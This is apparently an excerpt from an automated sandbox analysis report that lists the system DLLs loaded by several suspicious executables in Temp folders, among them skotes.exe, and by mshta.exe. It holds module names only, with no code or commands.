Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1083218001\qFqSpAp.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1083218001\qFqSpAp.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1083218001\qFqSpAp.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1083218001\qFqSpAp.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1083218001\qFqSpAp.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1083218001\qFqSpAp.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1083218001\qFqSpAp.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1083218001\qFqSpAp.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1083218001\qFqSpAp.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1083218001\qFqSpAp.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1083218001\qFqSpAp.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1083218001\qFqSpAp.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1083218001\qFqSpAp.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1083218001\qFqSpAp.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1083218001\qFqSpAp.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1083218001\qFqSpAp.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1083218001\qFqSpAp.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1083218001\qFqSpAp.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1083218001\qFqSpAp.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1083218001\qFqSpAp.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1083218001\qFqSpAp.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1083218001\qFqSpAp.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1083218001\qFqSpAp.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1083218001\qFqSpAp.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1083218001\qFqSpAp.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1083218001\qFqSpAp.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1083218001\qFqSpAp.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1083218001\qFqSpAp.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1083218001\qFqSpAp.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1083218001\qFqSpAp.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1083218001\qFqSpAp.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1083218001\qFqSpAp.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1083218001\qFqSpAp.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1083218001\qFqSpAp.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1083218001\qFqSpAp.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1083218001\qFqSpAp.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1083537001\m5UP2Yj.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1083537001\m5UP2Yj.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1083537001\m5UP2Yj.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1083537001\m5UP2Yj.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1083537001\m5UP2Yj.exe	Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1083537001\m5UP2Yj.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1083537001\m5UP2Yj.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1083537001\m5UP2Yj.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1083537001\m5UP2Yj.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1083537001\m5UP2Yj.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1083537001\m5UP2Yj.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1083537001\m5UP2Yj.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1083537001\m5UP2Yj.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1083537001\m5UP2Yj.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1083537001\m5UP2Yj.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1083537001\m5UP2Yj.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1083537001\m5UP2Yj.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1083537001\m5UP2Yj.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1083537001\m5UP2Yj.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1083537001\m5UP2Yj.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1083537001\m5UP2Yj.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1083537001\m5UP2Yj.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1083537001\m5UP2Yj.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1084873001\7aencsM.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\1084873001\7aencsM.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1084873001\7aencsM.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1084873001\7aencsM.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1084873001\7aencsM.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1084873001\7aencsM.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1084873001\7aencsM.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1084873001\7aencsM.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1084873001\7aencsM.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1084873001\7aencsM.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1084873001\7aencsM.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1084873001\7aencsM.exe	Section loaded: dbghelp.dll
Source: C:\Users\user\AppData\Local\Temp\1084873001\7aencsM.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1084873001\7aencsM.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1084873001\7aencsM.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1084873001\7aencsM.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1084873001\7aencsM.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1084873001\7aencsM.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1084873001\7aencsM.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1084873001\7aencsM.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1084873001\7aencsM.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1084873001\7aencsM.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1084873001\7aencsM.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1084873001\7aencsM.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1084873001\7aencsM.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1084873001\7aencsM.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1084873001\7aencsM.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1084873001\7aencsM.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1084873001\7aencsM.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1084873001\7aencsM.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1084873001\7aencsM.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1084873001\7aencsM.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1084873001\7aencsM.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1084873001\7aencsM.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1084873001\7aencsM.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1084873001\7aencsM.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1084873001\7aencsM.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1084873001\7aencsM.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1084873001\7aencsM.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1084873001\7aencsM.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1084873001\7aencsM.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\1085378101\9db7f37142.exe	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\1085378101\9db7f37142.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1085378101\9db7f37142.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1085378101\9db7f37142.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1085378101\9db7f37142.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1085378101\9db7f37142.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1085378101\9db7f37142.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1085378101\9db7f37142.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1085378101\9db7f37142.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1085378101\9db7f37142.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1085378101\9db7f37142.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1085378101\9db7f37142.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: mshtml.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: powrprof.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: umpdc.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msiso.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: srpapi.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msimtf.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dxgi.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: resourcepolicyclient.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: textinputframework.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: coreuicomponents.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dataexchange.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: d3d11.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dcomp.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: twinapi.appcore.dll
